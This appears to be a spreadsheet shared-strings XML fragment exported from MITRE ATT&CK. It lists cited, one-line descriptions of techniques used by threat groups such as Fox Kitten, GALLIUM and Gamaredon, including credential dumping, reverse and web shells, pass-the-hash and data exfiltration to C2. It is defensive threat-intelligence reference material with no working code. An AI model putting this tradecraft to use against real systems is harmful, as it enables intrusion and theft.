    <t>[Fox Kitten](https://attack.mitre.org/groups/G0117) has base64 encoded scripts to avoid detection.(Citation: CISA AA20-259A Iran-Based Actor September 2020)</t>
  </si>
  <si>
    <t>relationship--2904937b-f1ed-4fa8-87e9-a7d69cbccc27</t>
  </si>
  <si>
    <t>[Fox Kitten](https://attack.mitre.org/groups/G0117) has used a Perl reverse shell to communicate with C2.(Citation: ClearSky Pay2Kitten December 2020)</t>
  </si>
  <si>
    <t>relationship--00fb61de-33f5-4e85-aca3-8e4016aa0bf8</t>
  </si>
  <si>
    <t>[Fox Kitten](https://attack.mitre.org/groups/G0117) has accessed files to gain valid credentials.(Citation: CISA AA20-259A Iran-Based Actor September 2020)</t>
  </si>
  <si>
    <t>relationship--4dbf47c1-c065-4e4c-8894-376d636555a2</t>
  </si>
  <si>
    <t>[Fox Kitten](https://attack.mitre.org/groups/G0117) has obtained files from the victim's cloud storage instances.(Citation: CISA AA20-259A Iran-Based Actor September 2020)</t>
  </si>
  <si>
    <t>relationship--118c566e-2042-4566-99c2-308351d50a40</t>
  </si>
  <si>
    <t>[Fox Kitten](https://attack.mitre.org/groups/G0117) has accessed victim security and IT environments and Microsoft Teams to mine valuable information.(Citation: CISA AA20-259A Iran-Based Actor September 2020)</t>
  </si>
  <si>
    <t>relationship--628054bd-e758-4528-a1fb-40983ecec149</t>
  </si>
  <si>
    <t>[Fox Kitten](https://attack.mitre.org/groups/G0117) has searched local system resources to access sensitive documents.(Citation: CISA AA20-259A Iran-Based Actor September 2020)</t>
  </si>
  <si>
    <t>relationship--32bc85f6-f022-4868-8934-bd00cc36f6d4</t>
  </si>
  <si>
    <t>[Fox Kitten](https://attack.mitre.org/groups/G0117) has searched network shares to access sensitive documents.(Citation: CISA AA20-259A Iran-Based Actor September 2020)</t>
  </si>
  <si>
    <t>relationship--d51c9d02-a701-4334-9dbc-bba6c128ba2b</t>
  </si>
  <si>
    <t>[Fox Kitten](https://attack.mitre.org/groups/G0117) has used the Softerra LDAP browser to browse documentation on service accounts.(Citation: CISA AA20-259A Iran-Based Actor September 2020)</t>
  </si>
  <si>
    <t>relationship--8b425ec5-7be4-4225-a7c5-8f219fed7b6c</t>
  </si>
  <si>
    <t>[Fox Kitten](https://attack.mitre.org/groups/G0117) has created KeyBase accounts to communicate with ransomware victims.(Citation: ClearSky Pay2Kitten December 2020)(Citation: Check Point Pay2Key November 2020)</t>
  </si>
  <si>
    <t>relationship--340a62c8-9f22-4cb6-9310-bd4136e14258</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</si>
  <si>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</si>
  <si>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relationship--6d4f3696-caa9-4100-bef5-e42d0f18470e</t>
  </si>
  <si>
    <t>[Fox Kitten](https://attack.mitre.org/groups/G0117) has exploited known vulnerabilities in remote services including RDP.(Citation: ClearkSky Fox Kitten February 2020)(Citation: CrowdStrike PIONEER KITTEN August 2020)(Citation: ClearSky Pay2Kitten December 2020)</t>
  </si>
  <si>
    <t>relationship--1cfc2e72-a9ce-4dc2-95ad-fb99c90a2880</t>
  </si>
  <si>
    <t>[Fox Kitten](https://attack.mitre.org/groups/G0117) has used WizTree to obtain network files and directory listings.(Citation: CISA AA20-259A Iran-Based Actor September 2020)</t>
  </si>
  <si>
    <t>relationship--f0026b7c-9a9a-468d-a152-1b214efe066a</t>
  </si>
  <si>
    <t>[Fox Kitten](https://attack.mitre.org/groups/G0117) has downloaded additional tools including [PsExec](https://attack.mitre.org/software/S0029) directly to endpoints.(Citation: CISA AA20-259A Iran-Based Actor September 2020)</t>
  </si>
  <si>
    <t>relationship--00de3cf9-73c4-4b04-a074-a5d73e9b61de</t>
  </si>
  <si>
    <t>[Fox Kitten](https://attack.mitre.org/groups/G0117) has used prodump to dump credentials from LSASS.(Citation: CISA AA20-259A Iran-Based Actor September 2020)</t>
  </si>
  <si>
    <t>relationship--a3b4a3e9-2552-43dc-957a-5c7f64fac9f1</t>
  </si>
  <si>
    <t>[Fox Kitten](https://attack.mitre.org/groups/G0117) has accessed ntuser.dat and UserClass.dat on compromised hosts.(Citation: CISA AA20-259A Iran-Based Actor September 2020)</t>
  </si>
  <si>
    <t>relationship--8a4b2f39-183a-40e9-a8af-f3727061c17d</t>
  </si>
  <si>
    <t>[Fox Kitten](https://attack.mitre.org/groups/G0117) has created a local user account with administrator privileges.(Citation: ClearSky Pay2Kitten December 2020)</t>
  </si>
  <si>
    <t>relationship--26ce5847-3f53-4736-92c6-7a82e17cd884</t>
  </si>
  <si>
    <t>[Fox Kitten](https://attack.mitre.org/groups/G0117) has named the task for a reverse proxy lpupdate to appear legitimate.(Citation: CISA AA20-259A Iran-Based Actor September 2020)</t>
  </si>
  <si>
    <t>relationship--a27943d2-6839-4be3-81ea-19ea6704d218</t>
  </si>
  <si>
    <t>[Fox Kitten](https://attack.mitre.org/groups/G0117) has named binaries and configuration files svhost and dllhost respectively to appear legitimate.(Citation: CISA AA20-259A Iran-Based Actor September 2020)</t>
  </si>
  <si>
    <t>relationship--e51ab951-2e6f-4c7e-bd10-fe0dc0bb4671</t>
  </si>
  <si>
    <t>[Fox Kitten](https://attack.mitre.org/groups/G0117) has used Volume Shadow Copy to access credential information from NTDS.(Citation: CISA AA20-259A Iran-Based Actor September 2020)</t>
  </si>
  <si>
    <t>relationship--71b92fe6-dd99-4192-b327-8ef27b790123</t>
  </si>
  <si>
    <t>[Fox Kitten](https://attack.mitre.org/groups/G0117) has used tools including NMAP to conduct broad scanning to identify open ports.(Citation: CISA AA20-259A Iran-Based Actor September 2020)(Citation: ClearSky Pay2Kitten December 2020)</t>
  </si>
  <si>
    <t>relationship--dd0c5079-1bd3-45fa-b8e7-aabf0a5513b7</t>
  </si>
  <si>
    <t>[Fox Kitten](https://attack.mitre.org/groups/G0117) has base64 encoded payloads to avoid detection.(Citation: CISA AA20-259A Iran-Based Actor September 2020)</t>
  </si>
  <si>
    <t>relationship--5fa15bc3-e7ec-4617-bf30-b5258af8b2ec</t>
  </si>
  <si>
    <t>[Fox Kitten](https://attack.mitre.org/groups/G0117) has used scripts to access credential information from the KeePass database.(Citation: CISA AA20-259A Iran-Based Actor September 2020)</t>
  </si>
  <si>
    <t>relationship--70fe7f39-41de-4d7d-b691-4ac17c1a4c58</t>
  </si>
  <si>
    <t>[Fox Kitten](https://attack.mitre.org/groups/G0117) has used PowerShell scripts to access credential data.(Citation: CISA AA20-259A Iran-Based Actor September 2020)</t>
  </si>
  <si>
    <t>relationship--ecc9a971-349b-428d-a376-74f11b5b7086</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</si>
  <si>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</si>
  <si>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relationship--bdaf3340-0580-4e89-9cdc-e0af5a91ed85</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</si>
  <si>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</si>
  <si>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relationship--a637133c-2b07-4e57-8822-5c3bc4b584d7</t>
  </si>
  <si>
    <t>[Fox Kitten](https://attack.mitre.org/groups/G0117) has accessed Registry hives ntuser.dat and UserClass.dat.(Citation: CISA AA20-259A Iran-Based Actor September 2020)</t>
  </si>
  <si>
    <t>relationship--b8b16140-82bc-42a0-82f7-bfc402f4b4a4</t>
  </si>
  <si>
    <t>[Fox Kitten](https://attack.mitre.org/groups/G0117) has used RDP to log in and move laterally in the target environment.(Citation: CISA AA20-259A Iran-Based Actor September 2020)(Citation: ClearSky Pay2Kitten December 2020)</t>
  </si>
  <si>
    <t>relationship--d32354c1-0668-4997-825e-7f5652826ab9</t>
  </si>
  <si>
    <t>[Fox Kitten](https://attack.mitre.org/groups/G0117) has used Angry IP Scanner to detect remote systems.(Citation: CISA AA20-259A Iran-Based Actor September 2020)</t>
  </si>
  <si>
    <t>relationship--1374e38c-db37-46f8-8560-63901a3e7e56</t>
  </si>
  <si>
    <t>[Fox Kitten](https://attack.mitre.org/groups/G0117) has used valid accounts to access SMB shares.(Citation: CISA AA20-259A Iran-Based Actor September 2020)</t>
  </si>
  <si>
    <t>relationship--65e9d954-30d8-4354-ad5c-3a6d69867a7e</t>
  </si>
  <si>
    <t>[Fox Kitten](https://attack.mitre.org/groups/G0117) has used the PuTTY and Plink tools for lateral movement.(Citation: CISA AA20-259A Iran-Based Actor September 2020)</t>
  </si>
  <si>
    <t>relationship--91b41079-6c44-439e-a76c-2a128a792e17</t>
  </si>
  <si>
    <t>[Fox Kitten](https://attack.mitre.org/groups/G0117) has used Scheduled Tasks for persistence and to load and execute a reverse proxy binary.(Citation: CISA AA20-259A Iran-Based Actor September 2020)(Citation: ClearSky Pay2Kitten December 2020)</t>
  </si>
  <si>
    <t>relationship--99c87be1-d8f1-4b41-836f-8811628c4b80</t>
  </si>
  <si>
    <t>[Fox Kitten](https://attack.mitre.org/groups/G0117) has used a Twitter account to communicate with ransomware victims.(Citation: ClearSky Pay2Kitten December 2020)</t>
  </si>
  <si>
    <t>relationship--e463f5ae-4b7a-40dd-94e1-1a04a22e5e23</t>
  </si>
  <si>
    <t>[Fox Kitten](https://attack.mitre.org/groups/G0117) has installed TightVNC server and client on compromised servers and endpoints for lateral movement.(Citation: CISA AA20-259A Iran-Based Actor September 2020)</t>
  </si>
  <si>
    <t>relationship--3d3ea12b-fec0-4daa-bb51-190884d88ee0</t>
  </si>
  <si>
    <t>[Fox Kitten](https://attack.mitre.org/groups/G0117) has used valid credentials with various services during lateral movement.(Citation: CISA AA20-259A Iran-Based Actor September 2020)</t>
  </si>
  <si>
    <t>relationship--db08c6bc-0a2a-41f3-bcb2-5410f9e0afa6</t>
  </si>
  <si>
    <t>[Fox Kitten](https://attack.mitre.org/groups/G0117) has used Amazon Web Services to host C2.(Citation: ClearSky Pay2Kitten December 2020)</t>
  </si>
  <si>
    <t>relationship--d452da85-b408-458f-ad25-937605de4611</t>
  </si>
  <si>
    <t>[Fox Kitten](https://attack.mitre.org/groups/G0117) has installed web shells on compromised hosts to maintain access.(Citation: CISA AA20-259A Iran-Based Actor September 2020)(Citation: ClearSky Pay2Kitten December 2020)</t>
  </si>
  <si>
    <t>relationship--96772bc0-7a9e-4688-95a2-67fff1646be4</t>
  </si>
  <si>
    <t>[Fox Kitten](https://attack.mitre.org/groups/G0117) has used cmd.exe likely as a password changing mechanism.(Citation: CISA AA20-259A Iran-Based Actor September 2020)</t>
  </si>
  <si>
    <t>relationship--54b2d2db-b1d8-49aa-82f3-08d8a53a4899</t>
  </si>
  <si>
    <t>[GALLIUM](https://attack.mitre.org/groups/G0093) used WinRAR to compress and encrypt stolen data prior to exfiltration.(Citation: Cybereason Soft Cell June 2019)(Citation: Microsoft GALLIUM December 2019)</t>
  </si>
  <si>
    <t>relationship--86246bef-ad4c-4c30-805a-d6f1928a7c20</t>
  </si>
  <si>
    <t>[GALLIUM](https://attack.mitre.org/groups/G0093) has used stolen certificates to sign its tools including those from Whizzimo LLC.(Citation: Microsoft GALLIUM December 2019)</t>
  </si>
  <si>
    <t>relationship--2fc6e8dc-5117-41ea-9b5f-154cff612f6f</t>
  </si>
  <si>
    <t>[GALLIUM](https://attack.mitre.org/groups/G0093) used DLL side-loading to covertly load [PoisonIvy](https://attack.mitre.org/software/S0012) into memory on the victim machine.(Citation: Cybereason Soft Cell June 2019)</t>
  </si>
  <si>
    <t>relationship--3b523bd9-ffc2-4525-a08c-4500bfcb2fed</t>
  </si>
  <si>
    <t>[GALLIUM](https://attack.mitre.org/groups/G0093) collected data from the victim's local system, including password hashes from the SAM hive in the Registry.(Citation: Cybereason Soft Cell June 2019)</t>
  </si>
  <si>
    <t>relationship--38be247c-74b0-42f3-964e-5f23ef42a353</t>
  </si>
  <si>
    <t>[GALLIUM](https://attack.mitre.org/groups/G0093) created high-privileged domain user accounts to maintain access to victim networks.(Citation: Cybereason Soft Cell June 2019)(Citation: Microsoft GALLIUM December 2019)</t>
  </si>
  <si>
    <t>relationship--433ccc4b-5a1f-49e2-9517-f8f899646cab</t>
  </si>
  <si>
    <t>[GALLIUM](https://attack.mitre.org/groups/G0093) used Web shells and [HTRAN](https://attack.mitre.org/software/S0040) for C2 and to exfiltrate data.(Citation: Cybereason Soft Cell June 2019)</t>
  </si>
  <si>
    <t>relationship--380743e5-616c-4524-96e6-d545e5b653ea</t>
  </si>
  <si>
    <t>[GALLIUM](https://attack.mitre.org/groups/G0093) exploited a publicly-facing servers including Wildfly/JBoss servers to gain access to the network.(Citation: Cybereason Soft Cell June 2019)(Citation: Microsoft GALLIUM December 2019)</t>
  </si>
  <si>
    <t>relationship--ad60e0be-02a4-4f79-a81d-afdde78492be</t>
  </si>
  <si>
    <t>[GALLIUM](https://attack.mitre.org/groups/G0093) used a modified version of [HTRAN](https://attack.mitre.org/software/S0040) to redirect connections between networks.(Citation: Cybereason Soft Cell June 2019)</t>
  </si>
  <si>
    <t>relationship--a084527d-2858-4037-bc48-68c1eac85acb</t>
  </si>
  <si>
    <t>[GALLIUM](https://attack.mitre.org/groups/G0093) has used VPN services, including SoftEther VPN, to access and maintain persistence in victim environments.(Citation: Cybereason Soft Cell June 2019)(Citation: Microsoft GALLIUM December 2019)</t>
  </si>
  <si>
    <t>relationship--57b4f42b-02e2-4cee-98f0-d6935c1e2c7b</t>
  </si>
  <si>
    <t>[GALLIUM](https://attack.mitre.org/groups/G0093) ensured each payload had a unique hash, including by using different types of packers.(Citation: Cybereason Soft Cell June 2019)</t>
  </si>
  <si>
    <t>relationship--919f6143-eb8c-48cd-8741-118040c372ab</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</si>
  <si>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</si>
  <si>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relationship--e1268feb-9326-40e1-b05b-fd8e0068488a</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</si>
  <si>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</si>
  <si>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relationship--7adea746-109e-41c2-bf48-20e0282038a0</t>
  </si>
  <si>
    <t>[GALLIUM](https://attack.mitre.org/groups/G0093) has used [PsExec](https://attack.mitre.org/software/S0029) to move laterally between hosts in the target network.(Citation: Microsoft GALLIUM December 2019)</t>
  </si>
  <si>
    <t>relationship--89697f9e-cfd2-4273-a5d6-04354f0c3e7c</t>
  </si>
  <si>
    <t>[GALLIUM](https://attack.mitre.org/groups/G0093) compressed and staged files in multi-part archives in the Recycle Bin prior to exfiltration.(Citation: Cybereason Soft Cell June 2019)</t>
  </si>
  <si>
    <t>relationship--a68d8191-b374-4741-a249-1db3515d581b</t>
  </si>
  <si>
    <t>[GALLIUM](https://attack.mitre.org/groups/G0093) used a modified version of [HTRAN](https://attack.mitre.org/software/S0040) in which they obfuscated strings such as debug messages in an apparent attempt to evade detection.(Citation: Cybereason Soft Cell June 2019)</t>
  </si>
  <si>
    <t>relationship--2bff8dad-2ef1-485c-8c0b-62a5ba4c384b</t>
  </si>
  <si>
    <t>[GALLIUM](https://attack.mitre.org/groups/G0093) used dumped hashes to authenticate to other machines via pass the hash.(Citation: Cybereason Soft Cell June 2019)</t>
  </si>
  <si>
    <t>relationship--ee4d1b24-603f-40df-8f21-3c053fba275f</t>
  </si>
  <si>
    <t>[GALLIUM](https://attack.mitre.org/groups/G0093) used PowerShell for execution to assist in lateral movement as well as for dumping credentials stored on compromised machines.(Citation: Cybereason Soft Cell June 2019)</t>
  </si>
  <si>
    <t>relationship--8698cc92-79ad-46c4-9cb8-30ef87a8d760</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</si>
  <si>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</si>
  <si>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relationship--ea71022e-7f2a-4065-9cb1-304f85dbaf6d</t>
  </si>
  <si>
    <t>[GALLIUM](https://attack.mitre.org/groups/G0093) used a renamed cmd.exe file to evade detection.(Citation: Cybereason Soft Cell June 2019)</t>
  </si>
  <si>
    <t>relationship--f8517b42-4d52-417a-a5dc-cbfb2a31930b</t>
  </si>
  <si>
    <t>[GALLIUM](https://attack.mitre.org/groups/G0093) established persistence for [PoisonIvy](https://attack.mitre.org/software/S0012) by created a scheduled task.(Citation: Cybereason Soft Cell June 2019)</t>
  </si>
  <si>
    <t>relationship--272c29eb-9f83-4a90-a9b2-e823182204a7</t>
  </si>
  <si>
    <t>[GALLIUM](https://attack.mitre.org/groups/G0093) used &lt;code&gt;reg&lt;/code&gt; commands to dump specific hives from the Windows Registry, such as the SAM hive, and obtain password hashes.(Citation: Cybereason Soft Cell June 2019)</t>
  </si>
  <si>
    <t>relationship--1a28a0a2-8e2f-4c42-b6b0-0ffe3d821528</t>
  </si>
  <si>
    <t>[GALLIUM](https://attack.mitre.org/groups/G0093) has used Taiwan-based servers that appear to be exclusive to [GALLIUM](https://attack.mitre.org/groups/G0093).(Citation: Microsoft GALLIUM December 2019)</t>
  </si>
  <si>
    <t>relationship--45c9645b-05df-4ec0-9965-293587c3928e</t>
  </si>
  <si>
    <t>[GALLIUM](https://attack.mitre.org/groups/G0093) packed some payloads using different types of packers, both known and custom.(Citation: Cybereason Soft Cell June 2019)</t>
  </si>
  <si>
    <t>relationship--5d8315ce-3c76-4b78-8d6a-f0b7b101bcc0</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</si>
  <si>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</si>
  <si>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relationship--b10df154-0c2a-4159-ac0a-1bdaa78f56cb</t>
  </si>
  <si>
    <t>[GALLIUM](https://attack.mitre.org/groups/G0093) used &lt;code&gt;netstat -oan&lt;/code&gt; to obtain information about the victim network connections.(Citation: Cybereason Soft Cell June 2019)</t>
  </si>
  <si>
    <t>relationship--a29a37fc-86e2-4b93-8fa5-560b0a395fbc</t>
  </si>
  <si>
    <t>[GALLIUM](https://attack.mitre.org/groups/G0093) used &lt;code&gt;whoami&lt;/code&gt; and &lt;code&gt;query user&lt;/code&gt; to obtain information about the victim user.(Citation: Cybereason Soft Cell June 2019)</t>
  </si>
  <si>
    <t>relationship--aa64ee12-ae96-40fe-ba37-a8893cd321ec</t>
  </si>
  <si>
    <t>[GALLIUM](https://attack.mitre.org/groups/G0093) has used a variety of widely-available tools, which in some cases they modified to add functionality and/or subvert antimalware solutions.(Citation: Microsoft GALLIUM December 2019)</t>
  </si>
  <si>
    <t>relationship--3faaf140-71cd-4cc2-91c9-f0980ca72079</t>
  </si>
  <si>
    <t>26 March 2021</t>
  </si>
  <si>
    <t>[GALLIUM](https://attack.mitre.org/groups/G0093) leveraged valid accounts to maintain access to a victim network.(Citation: Cybereason Soft Cell June 2019)</t>
  </si>
  <si>
    <t>relationship--1a849525-ee44-4c28-86b2-fe883c45dc79</t>
  </si>
  <si>
    <t>[GALLIUM](https://attack.mitre.org/groups/G0093) used Web shells to persist in victim environments and assist in execution and exfiltration.(Citation: Cybereason Soft Cell June 2019)(Citation: Microsoft GALLIUM December 2019)</t>
  </si>
  <si>
    <t>relationship--626697e3-0d05-4081-aa11-61280a502249</t>
  </si>
  <si>
    <t>[GALLIUM](https://attack.mitre.org/groups/G0093) used the Windows command shell to execute commands.(Citation: Cybereason Soft Cell June 2019)</t>
  </si>
  <si>
    <t>relationship--15a8c4ba-f86d-4b2f-a0c7-9390d22dbd4e</t>
  </si>
  <si>
    <t>[GALLIUM](https://attack.mitre.org/groups/G0093) used WMI for execution to assist in lateral movement as well as for installing tools across multiple assets.(Citation: Cybereason Soft Cell June 2019)</t>
  </si>
  <si>
    <t>relationship--402e9430-9d3a-4694-89ca-923dab3fba26</t>
  </si>
  <si>
    <t>G0036</t>
  </si>
  <si>
    <t>GCMAN</t>
  </si>
  <si>
    <t>intrusion-set--0ea72cd5-ca30-46ba-bc04-378f701c658f</t>
  </si>
  <si>
    <t>[GCMAN](https://attack.mitre.org/groups/G0036) uses Putty for lateral movement.(Citation: Securelist GCMAN)</t>
  </si>
  <si>
    <t>relationship--7db7f665-6e29-4789-8a3d-d6cb8d0af31e</t>
  </si>
  <si>
    <t>[GCMAN](https://attack.mitre.org/groups/G0036) uses VNC for lateral movement.(Citation: Securelist GCMAN)</t>
  </si>
  <si>
    <t>relationship--35f5caad-87d0-46c5-b2b6-eb69b0eda6bd</t>
  </si>
  <si>
    <t>[GOLD SOUTHFIELD](https://attack.mitre.org/groups/G0115) has executed base64 encoded PowerShell scripts on compromised hosts.(Citation: Tetra Defense Sodinokibi March 2020)</t>
  </si>
  <si>
    <t>relationship--ba7fad22-26af-43f1-a120-6a4d4269d9ab</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</si>
  <si>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</si>
  <si>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relationship--689b0bff-7eb4-4678-997b-64794c56add0</t>
  </si>
  <si>
    <t>[GOLD SOUTHFIELD](https://attack.mitre.org/groups/G0115) has exploited Oracle WebLogic vulnerabilities for initial compromise.(Citation: Secureworks REvil September 2019)</t>
  </si>
  <si>
    <t>relationship--42d0b653-1d08-4e7b-910f-753412fda316</t>
  </si>
  <si>
    <t xml:space="preserve">[GOLD SOUTHFIELD](https://attack.mitre.org/groups/G0115) has used publicly-accessible RDP and remote management and monitoring (RMM) servers to gain access to victim machines.(Citation: Secureworks REvil September 2019)	</t>
  </si>
  <si>
    <t>relationship--bc7f00a2-ba1c-428a-ba8f-174703389c73</t>
  </si>
  <si>
    <t>[GOLD SOUTHFIELD](https://attack.mitre.org/groups/G0115) has conducted malicious spam (malspam) campaigns to gain access to victim's machines.(Citation: Secureworks REvil September 2019)</t>
  </si>
  <si>
    <t>relationship--f7aab529-962c-4bb8-812b-d63e0f8df494</t>
  </si>
  <si>
    <t>[GOLD SOUTHFIELD](https://attack.mitre.org/groups/G0115) has staged and executed PowerShell scripts on compromised hosts.(Citation: Tetra Defense Sodinokibi March 2020)</t>
  </si>
  <si>
    <t>relationship--deec4c70-b8b5-420b-bdc7-88badae84456</t>
  </si>
  <si>
    <t>[GOLD SOUTHFIELD](https://attack.mitre.org/groups/G0115) has used the cloud-based remote management and monitoring tool "ConnectWise Control" to deploy [REvil](https://attack.mitre.org/software/S0496).(Citation: Tetra Defense Sodinokibi March 2020)</t>
  </si>
  <si>
    <t>relationship--58a574e4-ba44-4472-92fe-c50a9a9cbb49</t>
  </si>
  <si>
    <t>[GOLD SOUTHFIELD](https://attack.mitre.org/groups/G0115) has used the remote monitoring and management tool ConnectWise to obtain screen captures from victim's machines.(Citation: Tetra Defense Sodinokibi March 2020)</t>
  </si>
  <si>
    <t>relationship--513f6b4c-c9b1-4339-910e-376b2a908689</t>
  </si>
  <si>
    <t>[GOLD SOUTHFIELD](https://attack.mitre.org/groups/G0115) has breached Managed Service Providers (MSP's) to deliver malware to MSP customers.(Citation: Secureworks REvil September 2019)</t>
  </si>
  <si>
    <t>relationship--1567be6a-0231-4605-b92b-ae1bc5e1bb4e</t>
  </si>
  <si>
    <t>G0084</t>
  </si>
  <si>
    <t>Gallmaker</t>
  </si>
  <si>
    <t>intrusion-set--2fd2be6a-d3a2-4a65-b499-05ea2693abee</t>
  </si>
  <si>
    <t>[Gallmaker](https://attack.mitre.org/groups/G0084) has used WinZip, likely to archive data prior to exfiltration.(Citation: Symantec Gallmaker Oct 2018)</t>
  </si>
  <si>
    <t>relationship--5677034a-7015-44a2-94b3-9913bc76b9c7</t>
  </si>
  <si>
    <t>[Gallmaker](https://attack.mitre.org/groups/G0084) attempted to exploit Microsoft’s DDE protocol in order to gain access to victim machines and for execution.(Citation: Symantec Gallmaker Oct 2018)</t>
  </si>
  <si>
    <t>relationship--9d82ba74-8cfa-4f6c-a1a0-f23fe8a738cf</t>
  </si>
  <si>
    <t>[Gallmaker](https://attack.mitre.org/groups/G0084) sent victims a lure document with a warning that asked victims to “enable content” for execution.(Citation: Symantec Gallmaker Oct 2018)</t>
  </si>
  <si>
    <t>relationship--2552aaa5-2cd7-4940-a428-220412851242</t>
  </si>
  <si>
    <t>[Gallmaker](https://attack.mitre.org/groups/G0084) obfuscated shellcode used during execution.(Citation: Symantec Gallmaker Oct 2018)</t>
  </si>
  <si>
    <t>relationship--2e165a8a-928e-488e-ad16-afb77a94b460</t>
  </si>
  <si>
    <t>[Gallmaker](https://attack.mitre.org/groups/G0084) used PowerShell to download additional payloads and for execution.(Citation: Symantec Gallmaker Oct 2018)</t>
  </si>
  <si>
    <t>relationship--ac048ca9-efc6-46fd-90fe-b9d2a641f037</t>
  </si>
  <si>
    <t>[Gallmaker](https://attack.mitre.org/groups/G0084) sent emails with malicious Microsoft Office documents attached.(Citation: Symantec Gallmaker Oct 2018)</t>
  </si>
  <si>
    <t>relationship--fb0121a7-4ba2-4e6d-a12d-b7375581b943</t>
  </si>
  <si>
    <t>[Gamaredon Group](https://attack.mitre.org/groups/G0047) has deployed scripts on compromised systems that automatically scan for interesting documents.(Citation: ESET Gamaredon June 2020)</t>
  </si>
  <si>
    <t>relationship--1de5c5fb-ba73-446b-8596-225cb5bcb611</t>
  </si>
  <si>
    <t>31 August 2020</t>
  </si>
  <si>
    <t>[Gamaredon Group](https://attack.mitre.org/groups/G0047) has used modules that automatically upload gathered documents to the C2 server.(Citation: ESET Gamaredon June 2020)</t>
  </si>
  <si>
    <t>relationship--c623d41f-3af0-4e3a-bf4f-8550bec85b37</t>
  </si>
  <si>
    <t xml:space="preserve">[Gamaredon Group](https://attack.mitre.org/groups/G0047) has obfuscated .NET executables by inserting junk code.(Citation: ESET Gamaredon June 2020)	</t>
  </si>
  <si>
    <t>relationship--28c17b23-901c-46d5-84f2-544401f68d83</t>
  </si>
  <si>
    <t>[Gamaredon Group](https://attack.mitre.org/groups/G0047) has used obfuscated or encrypted scripts.(Citation: ESET Gamaredon June 2020)(Citation: Microsoft Actinium February 2022)</t>
  </si>
  <si>
    <t>relationship--e17c193a-d616-42d3-9525-940f3424c96c</t>
  </si>
  <si>
    <t xml:space="preserve">[Gamaredon Group](https://attack.mitre.org/groups/G0047) has compiled the source code for a downloader directly on the infected system using the built-in &lt;code&gt;Microsoft.CSharp.CSharpCodeProvider&lt;/code&gt; class.(Citation: ESET Gamaredon June 2020)	</t>
  </si>
  <si>
    <t>relationship--2278eb19-1ff4-4406-ab79-03108732330c</t>
  </si>
  <si>
    <t xml:space="preserve">[Gamaredon Group](https://attack.mitre.org/groups/G0047) malware can insert malicious macros into documents using a &lt;code&gt;Microsoft.Office.Interop&lt;/code&gt; object.(Citation: ESET Gamaredon June 2020)	</t>
  </si>
  <si>
    <t>relationship--69513daf-2acd-4b04-a7be-9f31174a2ae9</t>
  </si>
  <si>
    <t>[Gamaredon Group](https://attack.mitre.org/groups/G0047) has used tools to delete files and folders from victims' desktops and profiles.(Citation: CERT-EE Gamaredon January 2021)</t>
  </si>
  <si>
    <t>relationship--a2e09ef2-2511-476b-8759-264843b4d772</t>
  </si>
  <si>
    <t>[Gamaredon Group](https://attack.mitre.org/groups/G0047) has collected files from infected systems and uploaded them to a C2 server.(Citation: ESET Gamaredon June 2020)</t>
  </si>
  <si>
    <t>relationship--430afd29-f2c0-43d3-b7bf-e7a549960254</t>
  </si>
  <si>
    <t>[Gamaredon Group](https://attack.mitre.org/groups/G0047) malware has collected Microsoft Office documents from mapped network drives.(Citation: ESET Gamaredon June 2020)</t>
  </si>
  <si>
    <t>relationship--4716b9ec-a0d4-47db-a901-5a3b67d9e096</t>
  </si>
  <si>
    <t>A [Gamaredon Group](https://attack.mitre.org/groups/G0047) file stealer has the capability to steal data from newly connected logical volumes on a system, including USB drives.(Citation: Palo Alto Gamaredon Feb 2017)(Citation: ESET Gamaredon June 2020)</t>
  </si>
  <si>
    <t>relationship--788e8246-d835-42c6-b8b4-7efad31e4a84</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</si>
  <si>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</si>
  <si>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relationship--86bcc5c3-456e-4bac-a419-54f54af80325</t>
  </si>
  <si>
    <t xml:space="preserve">[Gamaredon Group](https://attack.mitre.org/groups/G0047) has delivered macros which can tamper with Microsoft Office security settings.(Citation: ESET Gamaredon June 2020)	</t>
  </si>
  <si>
    <t>relationship--7464b3a1-f7ab-481b-97d4-c98199e0a387</t>
  </si>
  <si>
    <t>[Gamaredon Group](https://attack.mitre.org/groups/G0047) has registered multiple domains to facilitate payload staging and C2.(Citation: Microsoft Actinium February 2022)(Citation: Unit 42 Gamaredon February 2022)</t>
  </si>
  <si>
    <t>relationship--ccdab928-86cd-4e6d-b477-0ec156f6105a</t>
  </si>
  <si>
    <t>18 February 2022</t>
  </si>
  <si>
    <t>21 February 2022</t>
  </si>
  <si>
    <t>[Gamaredon Group](https://attack.mitre.org/groups/G0047) has incorporated dynamic DNS domains in its infrastructure.(Citation: Unit 42 Gamaredon February 2022)</t>
  </si>
  <si>
    <t>relationship--eb77b635-6f00-4975-b36e-63c7a5c48e3c</t>
  </si>
  <si>
    <t>A [Gamaredon Group](https://attack.mitre.org/groups/G0047) file stealer can transfer collected files to a hardcoded C2 server.(Citation: Palo Alto Gamaredon Feb 2017)</t>
  </si>
  <si>
    <t>relationship--d361058d-a11b-470d-bed8-44bfd8e50393</t>
  </si>
  <si>
    <t>[Gamaredon Group](https://attack.mitre.org/groups/G0047) tools can delete files used during an operation.(Citation: TrendMicro Gamaredon April 2020)(Citation: Symantec Shuckworm January 2022)(Citation: CERT-EE Gamaredon January 2021)</t>
  </si>
  <si>
    <t>relationship--bda5489b-7735-4793-8816-fc2238f6957f</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</si>
  <si>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</si>
  <si>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relationship--16b915ff-7bf5-4032-b39a-9c8073847d77</t>
  </si>
  <si>
    <t>[Gamaredon Group](https://attack.mitre.org/groups/G0047) has used &lt;code&gt;hidcon&lt;/code&gt; to run batch files in a hidden console window.(Citation: Unit 42 Gamaredon February 2022)</t>
  </si>
  <si>
    <t>relationship--a987bd4f-dcb3-4fa8-8ca3-b76cfea921f6</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</si>
  <si>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</si>
  <si>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relationship--253b56a5-232f-44bc-af4d-85ccc12a0577</t>
  </si>
  <si>
    <t>[Gamaredon Group](https://attack.mitre.org/groups/G0047) has left taunting images and messages on the victims' desktops as proof of system access.(Citation: CERT-EE Gamaredon January 2021)</t>
  </si>
  <si>
    <t>relationship--09677a24-20ac-4983-a97f-f1b54282b609</t>
  </si>
  <si>
    <t>[Gamaredon Group](https://attack.mitre.org/groups/G0047) has used an Outlook VBA module on infected systems to send phishing emails with malicious attachments to other employees within the organization.(Citation: ESET Gamaredon June 2020)</t>
  </si>
  <si>
    <t>relationship--109bbda3-f97a-4067-81d6-ed635f251282</t>
  </si>
  <si>
    <t>[Gamaredon Group](https://attack.mitre.org/groups/G0047) has tested connectivity between a compromised machine and a C2 server using  [Ping](https://attack.mitre.org/software/S0097) with commands such as `CSIDL_SYSTEM\cmd.exe /c ping -n 1`.(Citation: Symantec Shuckworm January 2022)</t>
  </si>
  <si>
